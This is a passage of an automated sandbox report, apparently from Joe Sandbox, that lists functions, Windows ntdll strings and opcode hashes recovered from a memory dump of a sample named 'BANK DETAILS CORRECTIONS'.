                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    • API String ID: 0-2968386058
                                                                                    • Opcode ID: 45189ca0c02d6fe248abe4c30dec879b29572b4e9f9f22cc428f3efe1dfebf98
                                                                                    • Instruction ID: 57cdd234a5f477832a1b32e4620ec0564ddd32881005e953f59f40dd03cfa513
                                                                                    • Opcode Fuzzy Hash: 45189ca0c02d6fe248abe4c30dec879b29572b4e9f9f22cc428f3efe1dfebf98
                                                                                    • Instruction Fuzzy Hash: 18414171E00209EBEB11DBD8C891FEEBBBDAB54741F14816EE60DA7244D774DA44CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    • API String ID: 0-1373925480
                                                                                    • Opcode ID: 2118807f3bb7fa51df48c89b763be024ce3555dbc72045d02dc6ac2611135727
                                                                                    • Instruction ID: 9c681878c66acf6ff3dc472ed3d824e888125aef252cf01e48617701546e37dc
                                                                                    • Opcode Fuzzy Hash: 2118807f3bb7fa51df48c89b763be024ce3555dbc72045d02dc6ac2611135727
                                                                                    • Instruction Fuzzy Hash: 40410731D006588FEB26DBD9CA84BEDBBB8FFA5340F140469D90AEB792D7349901DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 019A4899
                                                                                    • LdrpCheckRedirection, xrefs: 019A488F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019A4888
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-3154609507
                                                                                    • Opcode ID: d02741d3d2af9bcfacbdd62bb494cd931a7275062122eb30a5b3e2e33fae7307
                                                                                    • Instruction ID: 6c7ae7c26651739b2eae2b4c3ebed81e6ec3e7ec7170401b2481fef2c16df7e2
                                                                                    • Opcode Fuzzy Hash: d02741d3d2af9bcfacbdd62bb494cd931a7275062122eb30a5b3e2e33fae7307
                                                                                    • Instruction Fuzzy Hash: 0D41D636A042919FCB21CE5CE840E267BE9EF89A51B8D056DED4DD7311D7B0D804CBD2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01930BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-2558761708
                                                                                    • Opcode ID: 2499103d31ef662dbb8c49d386c36311f7969319515172962d3105cab7d520a0
                                                                                    • Instruction ID: 49281c83a7be52c0e05a1e673784efc2bf6fe721c643a66c8339fb5ed54d68c5
                                                                                    • Opcode Fuzzy Hash: 2499103d31ef662dbb8c49d386c36311f7969319515172962d3105cab7d520a0
                                                                                    • Instruction Fuzzy Hash: 5E11DF313151069FEB29EA28C481F76B3BAEF80B1AF19852DF40ECB255DB30D885C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 019A20F3
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019A2104
                                                                                    • LdrpInitializationFailure, xrefs: 019A20FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2986994758
                                                                                    • Opcode ID: ade7e680f7dd783d27a1bf9eade95174d07319f6acafb2ac04ff83ae0f870abc
                                                                                    • Instruction ID: 6d07553d4e613c9963d3aa9a5f522c743e29a4fa56754e7a2a85af8c31de3886
                                                                                    • Opcode Fuzzy Hash: ade7e680f7dd783d27a1bf9eade95174d07319f6acafb2ac04ff83ae0f870abc
                                                                                    • Instruction Fuzzy Hash: C9F0C839640309AFEB25DB4CDC46F95376CFB81B54F500059FB0867281D5B0A645C691
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
                                                                                    • API String ID: 48624451-232158463
                                                                                    • Opcode ID: 7d41fef1d44f2a2f80d99cee5a12f6fa0382f982d50a8a8f0b006b8e496b763d
                                                                                    • Instruction ID: dd6a4c1ad3527acde49485146fe393ec19dbacb0ee441c5108a20eaa78966dc8
                                                                                    • Opcode Fuzzy Hash: 7d41fef1d44f2a2f80d99cee5a12f6fa0382f982d50a8a8f0b006b8e496b763d
                                                                                    • Instruction Fuzzy Hash: 9F714C71A0014A9FDB01DFA9C994FAEB7F8BF98704F154065E909E7251EB34EE05CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0192A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrResSearchResource Exit, xrefs: 0192AA25
                                                                                    • LdrResSearchResource Enter, xrefs: 0192AA13
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                    • API String ID: 0-4066393604
                                                                                    • Opcode ID: 9fe212cf137b0397c46bd9e4c6157d4359b31c7065f5ecf362ceeb080015c12b
                                                                                    • Instruction ID: 625c2be09e23d8667ad361f54b224448d27a8d54bf492b5dbe96adbbc0adfeae
                                                                                    • Opcode Fuzzy Hash: 9fe212cf137b0397c46bd9e4c6157d4359b31c7065f5ecf362ceeb080015c12b
                                                                                    • Instruction Fuzzy Hash: 7DE19272E002299FEF22DF99CA80BAEBBBAFF54710F104425E909E7655D734D941CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction ID: 95b8d3e0fed9d10f309e2ce79bbcf3fae4dbd5ee6824c8c29748937fced3be7a
                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction Fuzzy Hash: FEC1D4312043429BE726CF28C849B6BBBE5BFD4715F044A2CF699C72A0D775D505CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0199E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 885a2d9942a80393cf949fbe5692d74c6b0f562763a23084e84c5cd6ba4b9693
                                                                                    • Instruction ID: 77c2d5129a747505b22a82fda7b6f32c3633efebcbf57f150ee8cb5e7f69213a
                                                                                    • Opcode Fuzzy Hash: 885a2d9942a80393cf949fbe5692d74c6b0f562763a23084e84c5cd6ba4b9693
                                                                                    • Instruction Fuzzy Hash: 7F613971E00619AFDB25DFADC840BAEBBB9FB48700F14446EE64DEB291D731A940CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    • Opcode ID: a900d20ba27c2739d93f74947f3bae246cd3eab2b7ea6cb61134c79de1201fa7
                                                                                    • Instruction ID: c52b431c881809feb5c3de980efe0c1d890872e5a128f57bf9f427a6a58520be
                                                                                    • Opcode Fuzzy Hash: a900d20ba27c2739d93f74947f3bae246cd3eab2b7ea6cb61134c79de1201fa7
                                                                                    • Instruction Fuzzy Hash: 25512A71E0025DAFDF11DFA9CC90AEEBBBCEB54B54F100529E659B7290D6309A05CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • kLsE, xrefs: 01920540
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0192063D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    • Opcode ID: a4640bb3e06619c6041b9c4c9a18b4c0b19fa156b692cfef311cb2e67aa642b8
                                                                                    • Instruction ID: adc785d93e27dcecbb3f29497f0313a80edda3e56f0546bb6f69844dff96a693
                                                                                    • Opcode Fuzzy Hash: a4640bb3e06619c6041b9c4c9a18b4c0b19fa156b692cfef311cb2e67aa642b8
                                                                                    • Instruction Fuzzy Hash: 2951DE715007528FD734EF29C444AA7BBE8AF84305F18493EFAAE87245E770D545CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0192A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0192A309
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0192A2FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: 9638e24e5d7ea4842564c4c7b14d9e819e6e5126b47cfac51929df90a6965061
                                                                                    • Instruction ID: 04712ed76aba5f8611d0328dd27062e4204f33a779835a2f9aa5e3d9b85ccaa6
                                                                                    • Opcode Fuzzy Hash: 9638e24e5d7ea4842564c4c7b14d9e819e6e5126b47cfac51929df90a6965061
                                                                                    • Instruction Fuzzy Hash: 1541FF32A05269CFDB21DF59C840B6E7BF8FF85700F1440A9E908DB696E3B5CA00CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    • Opcode ID: 2050ff5e24176b10d87ce1048a8da597b2de9852c5e7a5e9d1056597e752e697
                                                                                    • Instruction ID: 9c4ff670e6a8a8c4b8b226f8a5437de4f094501f53fe0d1c1cfe161fe72dac9a
                                                                                    • Opcode Fuzzy Hash: 2050ff5e24176b10d87ce1048a8da597b2de9852c5e7a5e9d1056597e752e697
                                                                                    • Instruction Fuzzy Hash: 6B01F4B2241704AFD351DF24DD85F1677E8E794715F018A3DAA5CC7190E374D904CB5A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0192C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: 8233b4d3a1ba50283db10fd1f23716aeecab244e3c332c155d949e51d7303b5a
                                                                                    • Instruction ID: eb4aebad443ed107e35d44cd7009134624fe410d4df3d371897ca6437bbb3a7c
                                                                                    • Opcode Fuzzy Hash: 8233b4d3a1ba50283db10fd1f23716aeecab244e3c332c155d949e51d7303b5a
                                                                                    • Instruction Fuzzy Hash: 09825B75E002298FEB25CFA9C880BEDBBB5BF49710F148169E91DAB399D7309D41CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019CA118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                    • Instruction ID: 7d5a6d2e9a79005cece29ffff613995e287f951329a0e26cd523f7793ff0f5b3
                                                                                    • Opcode Fuzzy Hash: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                    • Instruction Fuzzy Hash: CE22CE706046A98BEB25CF29C094776BBF5BF44B41F08885DD9CA8F286F335D452CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 834c42152400c5cea01907e1181fe2b5e6029534d9de0c8e3f615323aa8dd052
                                                                                    • Instruction ID: 67d52604c7c9f006f33d198fa91b9cc4b304e115943ec3738d41b8cb81b55dce
                                                                                    • Opcode Fuzzy Hash: 834c42152400c5cea01907e1181fe2b5e6029534d9de0c8e3f615323aa8dd052
                                                                                    • Instruction Fuzzy Hash: BF919471940219AFEB21DF95CD85FAEBBB8EF58B50F540065F608AB190D774ED04CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 8f70c96ef3dce7306b6b242a65c1c9aac67fa436b866617c58b19c60b8cf6f37
                                                                                    • Instruction ID: 58fc892b426e54c3bc8ac97c2adc3d9be1aeb139b821dbd7f9cdbc04e6018cbc
                                                                                    • Opcode Fuzzy Hash: 8f70c96ef3dce7306b6b242a65c1c9aac67fa436b866617c58b19c60b8cf6f37
                                                                                    • Instruction Fuzzy Hash: C4917032901609AFDB22EBA5DC44FAFBF7EEF85B50F100019F54AA7250D774A901CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    • Opcode ID: 2223ca7e834c1a19104d23a754c7a17aca67778ba6960a634a0dabd2ac911ee5
                                                                                    • Instruction ID: 1b38fbd55edf5254e1260191aa135ad1e8456824772de97618bc6e5c331babf7
                                                                                    • Opcode Fuzzy Hash: 2223ca7e834c1a19104d23a754c7a17aca67778ba6960a634a0dabd2ac911ee5
                                                                                    • Instruction Fuzzy Hash: 91718275E0030ADFDF28CF9DD590AADBBB5BF88701F14852EE909AB241E7319941CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .mui
                                                                                    • API String ID: 0-1199573805
                                                                                    • Opcode ID: b71a324766a22466bcd36682701b56d31622043fe7198683109dea4a9ee12ce9
                                                                                    • Instruction ID: 4f513e71bec524b2820dee9799eb25463b8ae4b6ce39d74d90b7895c24a881d3
                                                                                    • Opcode Fuzzy Hash: b71a324766a22466bcd36682701b56d31622043fe7198683109dea4a9ee12ce9
                                                                                    • Instruction Fuzzy Hash: 7B519172E0022ADFDF10DF99D850EAEBBB8AF44F50F05412DEA59BB244D3349901CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0193E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    • Opcode ID: de7937174e64069d93a65b50b9ab87c7fb2ec688e95bf35af917b3d9e5c94268
                                                                                    • Instruction ID: d2258577c478e36fccfae1ad2fe0f5b9c2e9eab229f1e24ea28dece1815f98ff
                                                                                    • Opcode Fuzzy Hash: de7937174e64069d93a65b50b9ab87c7fb2ec688e95bf35af917b3d9e5c94268
                                                                                    • Instruction Fuzzy Hash: 11418072508346ABD722DA75C880FABB7ECAFC8714F44092DFA8DD7180E674DA04C796
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0199C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: cbc6312bb4e72247c0f3061148fedb022604477648a86640751d65dfceba604f
                                                                                    • Instruction ID: 342945721f9d929766314de3d3b8a6b966cfa8ad2b2c64b92a6e2c213b69433b
                                                                                    • Opcode Fuzzy Hash: cbc6312bb4e72247c0f3061148fedb022604477648a86640751d65dfceba604f
                                                                                    • Instruction Fuzzy Hash: 4C414FB1D0022DAFDF21DB64CC84FDEB77CAB85714F0045A5AA0CAB140DB709E898FA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    • Opcode ID: b37743291a6b5d1652cbe058964396956e5a1e5828943156cd02e27720d41a21
                                                                                    • Instruction ID: 8509a11e7c90f66a7c5d3fd461478a8cb8ec51bbc8265d804a286c23989912fc
                                                                                    • Opcode Fuzzy Hash: b37743291a6b5d1652cbe058964396956e5a1e5828943156cd02e27720d41a21
                                                                                    • Instruction Fuzzy Hash: 08310831E007199BEB22DB69C991BEE7BBCDF45704F144028EA49AB282D775FC05CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0199CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    • Opcode ID: d28071e9dcbcae80984b304669f15f5f2983477a4502b9e80877dfebac573181
                                                                                    • Instruction ID: fd16762bf426ead7166dd68f569b425624488c2b5c8f4cc020e9f4bad8f88894
                                                                                    • Opcode Fuzzy Hash: d28071e9dcbcae80984b304669f15f5f2983477a4502b9e80877dfebac573181
                                                                                    • Instruction Fuzzy Hash: AE31E33690151AAFEF16DB5DCC55E7FBBB8EB84760F014129A909A7290D730AE04DBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019A895E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    • Opcode ID: b4258c0171550e8867b907b892812dcf31aa92f32df951dba2933cebe4392877
                                                                                    • Instruction ID: c432c760c7987b3d3df22dc1a1ad2777f7fddab6235a29fd4d1bf81e68c07135
                                                                                    • Opcode Fuzzy Hash: b4258c0171550e8867b907b892812dcf31aa92f32df951dba2933cebe4392877
                                                                                    • Instruction Fuzzy Hash: BE012B36600211AFE6216B59CC84E967F6AFFC6656F84042CF64D06555CB30688AC7D2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019C2000 Relevance: .8, Instructions: 757COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 58f16fbc3f3e9b03b10c62942ef89dedb3c9c693e7343a6c60ca41d0a6767381
                                                                                    • Instruction ID: d0feb11da6f173f9b965ae35cb28224121ddd6ae2babd69cd904f0b1c2c68594
                                                                                    • Opcode Fuzzy Hash: 58f16fbc3f3e9b03b10c62942ef89dedb3c9c693e7343a6c60ca41d0a6767381
                                                                                    • Instruction Fuzzy Hash: D842C1356083419BE725CF68C890A6BBBE9BFC8B40F48092DFACA97250D771D945CB53
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019B8158 Relevance: .6, Instructions: 617COMMON
                                                                                    Download Yara Rule
